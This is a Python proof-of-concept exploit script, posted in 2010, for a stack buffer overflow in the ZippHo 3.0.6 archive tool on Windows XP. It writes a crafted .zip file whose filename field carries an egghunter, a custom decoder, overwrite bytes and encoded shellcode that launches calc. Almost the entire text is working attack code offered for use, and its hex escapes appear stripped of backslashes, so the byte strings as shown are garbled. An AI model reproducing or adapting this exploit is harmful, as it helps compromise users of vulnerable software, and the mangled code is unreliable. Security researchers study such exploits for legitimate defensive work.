zippho-overflow.py.txt
Posted on 19 March 2010
#!/usr/bin/python # ####################################################################### # ZippHo 3.0.6 (.zip) 0day stack buffer overflow PoC exploit # Author: mr_me - http://net-ninja.net/ & http://twitter.com/StevenSeeley # Download: http://www.brothersoft.com/zippho-71295.html # Platform: Windows XP sp3 En # Greetz to: Corelan Security Team & fl0 fl0w # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # ####################################################################### # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "| http://www.corelan.be:8800 |" print "| security@corelan.be |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] ZippHo 3.0.6 (.zip) 0day stack buffer overflow PoC exploit" # local file header lf_header = ("x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00" "x00x00x00x00x00x00x00x00xe4x0fx00x00x00") # central directory file header cdf_header = ("x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00" "x00x00x00x00x00x00x00x00x00xe4x0fx00x00x00x00x00x00x01x00" "x24x00x00x00x00x00x00x00") # end of central directory record efcdr_record = ("x50x4Bx05x06x00x00x00x00x01x00x01x00" "x12x10x00x00x02x10x00x00x00x00") # asci egghunter egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1" "9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA") # encoded calc calc = ("xd9xf7xd9x74x24xf4x5bx53x59x49x49x49x49x49x49" "x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41" "x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42" "x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b" "x4cx4ax48x51x54x45x50x43x30x45x50x4cx4bx51x55" "x47x4cx4cx4bx43x4cx43x35x43x48x43x31x4ax4fx4c" "x4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b" "x50x49x4cx4bx46x54x4cx4bx43x31x4ax4ex50x31x49" "x50x4ax39x4ex4cx4bx34x49x50x42x54x44x47x49x51" "x49x5ax44x4dx45x51x49x52x4ax4bx4bx44x47x4bx50" "x54x47x54x45x54x44x35x4dx35x4cx4bx51x4fx51x34" "x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51" "x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31" "x4ax4bx4cx49x51x4cx46x44x43x34x48x43x51x4fx50" "x31x4ax56x43x50x50x56x42x44x4cx4bx50x46x50x30" "x4cx4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4c" "x4bx42x48x45x58x4bx39x4ax58x4bx33x49x50x42x4a" "x50x50x42x48x4cx30x4cx4ax44x44x51x4fx45x38x4a" "x38x4bx4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43" "x45x31x42x4cx43x53x46x4ex43x55x43x48x45x35x45" "x50x41x41") # custom decoder decoder = ("x25x4Ax4Dx4Ex55" "x25x35x32x31x2Ax2dx55x55" "x55x5fx2dx56x55x56x5fx2d" "x55x55x55x5ex50x25x4Ax4D" "x4Ex55x25x35x32x31x2Ax2d" "x2bx6ax32x53x2dx2ax6ax31" "x54x2dx2ax69x31x54x50") # attack string exploit = "x43" * 10 exploit += egghunter exploit += "x41" * (221-len(exploit)) exploit += "x61" exploit += "x53" exploit += "x5c" exploit += decoder exploit += "x41" * (292-len(exploit)) exploit += "x73xf9x41x41" exploit += "x70x54x54x00" exploit += "x57x30x30x54" exploit += "x57x30x30x54" # I have no eyes, I make the flash of lightning my eyes ~ samurai creed. exploit += calc exploit += "x41" * (4064-len(exploit)) exploit += "x2ex74x78x74" print "[+] Writing attack string to file.." mefile = open('cst-zippho.zip','w') mefile.write(lf_header + exploit + efcdr_record + exploit + efcdr_record) mefile.close() print "[+] Created cst-zippho.zip!"
